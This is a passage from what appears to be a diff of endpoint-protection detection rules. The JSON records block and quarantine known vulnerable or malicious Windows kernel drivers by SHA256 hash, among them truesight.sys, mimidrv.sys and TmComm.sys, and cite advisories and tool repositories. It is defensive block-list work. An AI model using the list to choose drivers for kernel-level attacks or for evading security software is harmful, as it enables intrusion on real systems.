+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8837c645-02a1-5790-910a-45ce28fba910",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479901Z",
+ "creation_date": "2026-03-23T11:45:30.479903Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479908Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b3196a346973837242d92f3a0ff7bdc2485075d51de0b53650e4ef7348c7a83",
+ "comment": "Vulnerable NVIDIA Kernel Driver (aka nvoclock.sys) [https://github.com/zer0condition/NVDrv] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88453b33-0d34-5242-9680-aab402878ac4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.158859Z",
+ "creation_date": "2026-03-23T11:45:31.158861Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.158867Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e0f1aad657bb2576b5d110e698954fbcb5e7cbecea7811df2c66ef949e06afa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "884cd8f0-411f-59d2-b1b7-689892e04a4b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831639Z",
+ "creation_date": "2026-03-23T11:45:30.831641Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831647Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a418bce19620d466f516956279ac4072de1391ce704558317ad6b78146fff86",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88570ad1-2377-5dec-8b7a-2d997d6f8c9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819598Z",
+ "creation_date": "2026-03-23T11:45:31.819601Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "936131f90127991c8cc5bbadbd26016fbe148f0e9d039a5b40c5cedc19d6edf6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8859a137-3533-54bb-b847-9b2931451e98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825549Z",
+ "creation_date": "2026-03-23T11:45:31.825552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825561Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de08dfc173672c79e55af09e5bf86f5d9cb6968a9bb77457e689f629642f1b18",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "885d54e3-ed28-5275-b557-250956736422",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153840Z",
+ "creation_date": "2026-03-23T11:45:31.153842Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44899bc99bd4383c35fe36b6563509c1d4e9eca92b05378ee7b68eb1e0f7ac96",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "885f5aed-0869-59e5-b9ec-8a95e2e786a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462699Z",
+ "creation_date": "2026-03-23T11:45:30.462710Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462719Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e56e96df36237e65b3d7dbc490afdc826215158f6278cd579c576c4b455b392",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "886072b0-2957-594b-a14a-378352224ace",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827802Z",
+ "creation_date": "2026-03-23T11:45:31.827805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827812Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22d99dea02cef171a259514d5df1c7ad8bec039efa524adde6d8baf26c809945",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "886b6f9e-b4a0-5043-ad32-21f2f8486101",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157512Z",
+ "creation_date": "2026-03-23T11:45:31.157514Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9809b818ed8be17eb1df23699a3e56cc4ef2285d451110933790ef37cb2a193c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "886b904c-1b22-526f-a425-3ca94e908dbf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145291Z",
+ "creation_date": "2026-03-23T11:45:32.145295Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e681ed97f08f8dc269c85b75160a508e59ba3045ddb14f99d64dd767dc556ba",
+ "comment": "Malicious Kernel Driver (aka driver_77225a99.sys) [https://www.loldrivers.io/drivers/5fb86651-c152-404a-9a2f-0f54b0d2bb55/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "886f8a99-caa8-5a18-b353-0accdeb04181",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834326Z",
+ "creation_date": "2026-03-23T11:45:30.834329Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834338Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd0d5cfc979656771528d3b0b06176198ea6db6dce738a75a2a1104ec7d79adf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88750238-1419-5a83-a6fc-0908e9044de7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826549Z",
+ "creation_date": "2026-03-23T11:45:30.826551Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826557Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ad53841b2f9e90005057b3c436060baa8d2031f8c0e2dc43144452fa8c6d63b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88771e57-58bb-5fe1-ac07-e0c0eaae184c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815708Z",
+ "creation_date": "2026-03-23T11:45:30.815710Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815716Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be62ed235421930c84ce9c7789f3beb6b7a48a6bca9065063b7ce78effde1db2",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "887e1105-555e-5987-9c6d-e58bd375dc63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817053Z",
+ "creation_date": "2026-03-23T11:45:30.817055Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817060Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81d54ebef1716e195955046ffded498a5a7e325bf83e7847893aa3b0b3776d05",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8882eb4f-8a08-5d0a-9236-595dae04cca7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974299Z",
+ "creation_date": "2026-03-23T11:45:29.974301Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974306Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ed3d54fb8222d861785f0d7e71d6223278fbf4d0baa335a54813087d7c3674e",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "888a5efc-afe3-5771-aa34-3fb59335367d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622491Z",
+ "creation_date": "2026-03-23T11:45:29.622493Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622499Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e3b257357be41a18319332df7023c4407e2b93ac4c9e0c6754032e29f3763eac",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88aae4ce-8e46-53d9-8189-d07f835d6578",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823359Z",
+ "creation_date": "2026-03-23T11:45:30.823365Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823375Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "891ad430e7f1d58ef85b437505a6016fa99a72abcfd4734476efc5fc1fcd1cba",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller AntiMalware Driver (aka truesight.sys) [https://github.com/ph4nt0mbyt3/Darkside] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88bad8d1-2aa9-5ef7-8ae4-5dad7748abf8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820894Z",
+ "creation_date": "2026-03-23T11:45:30.820896Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820901Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37d999df20c1a0b8ffaef9484c213a97b9987ed308b4ba07316a6013fbd31c60",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88c1d35b-2a83-56c9-8320-2afc9bc424cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985304Z",
+ "creation_date": "2026-03-23T11:45:29.985306Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985311Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3243aab18e273a9b9c4280a57aecef278e10bfff19abb260d7a7820e41739099",
+ "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88c86f6d-8a0b-52ea-a2aa-62fc24430ccc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156073Z",
+ "creation_date": "2026-03-23T11:45:31.156075Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156081Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc8f9bb57eea8ab776ae7391505ffb5fdb7858d81270b97eac40cd7acdf81877",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88cd7ef8-9495-5684-aa6b-681251781c96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493143Z",
+ "creation_date": "2026-03-23T11:45:31.493146Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493155Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a8480b44d50421c9ec4cfa00590bc48ca68527e821cc3d7e71860b491e30a41b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88cfffe3-8b2d-5342-90d8-a4ebc453933a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492467Z",
+ "creation_date": "2026-03-23T11:45:31.492469Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5baedc54ef0f89578724cbd3ebe5d6c38c2c5795f6cd21e65e575f6a91ead007",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88d6e481-c171-5d3a-9281-935afca0df92",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
